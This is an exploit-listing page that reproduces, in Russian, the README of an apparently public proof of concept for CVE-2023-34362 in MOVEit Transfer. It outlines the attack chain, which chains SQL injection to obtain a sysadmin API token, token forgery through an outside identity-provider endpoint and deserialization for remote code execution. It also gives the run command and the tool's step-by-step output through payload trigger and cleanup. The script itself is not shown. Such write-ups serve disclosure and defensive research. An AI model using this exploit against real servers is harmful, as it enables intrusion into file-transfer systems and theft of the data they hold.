Sploitus

Exploit for CVE-2023-34362

kitploit · 2026-09-03

Exploit Code

MARKDOWN34 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HORIZON3AI-CVE-2023-34362
# CVE-2023-34362

POC для CVE-2023-34362, затрагивающий MOVEit Transfer

## Технический анализ

Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/moveit-transfer-cve-2023-34362-deep-dive-and-indicators-of-compromise/

## Краткое описание

Этот POC использует SQL-инъекцию для получения токена доступа к API системного администратора, а затем использует этот доступ для злоупотребления вызовом десериализации с целью получения удаленного выполнения кода.

Этому POC необходимо обратиться к конечной точке поставщика удостоверений, которая содержит правильные сертификаты RS256, используемые для подделки произвольных токенов пользователей. По умолчанию этот POC использует нашу конечную точку IDP, размещенную в AWS.

По умолчанию эксплойт записывает файл в C:\Windows\Temp\message.txt. Альтернативные полезные нагрузки могут быть сгенерированы с использованием проекта ysoserial.net.

## Использование

root@kitploit:~
    
    
    python CVE-2023-34362.py https://127.0.0.1
    [*] Getting sysadmin access token
    [*] Got access token
    [*] Getting FolderID
    [*] Got FolderID: 963611079
    [*] Starting file upload
    [*] Got FileID: 965943963
    [*] Injecting the payload
    [*] Payload injected
    [*] Triggering payload via resume call
    [+] Triggered the payload!
    [*] Deleting uploaded file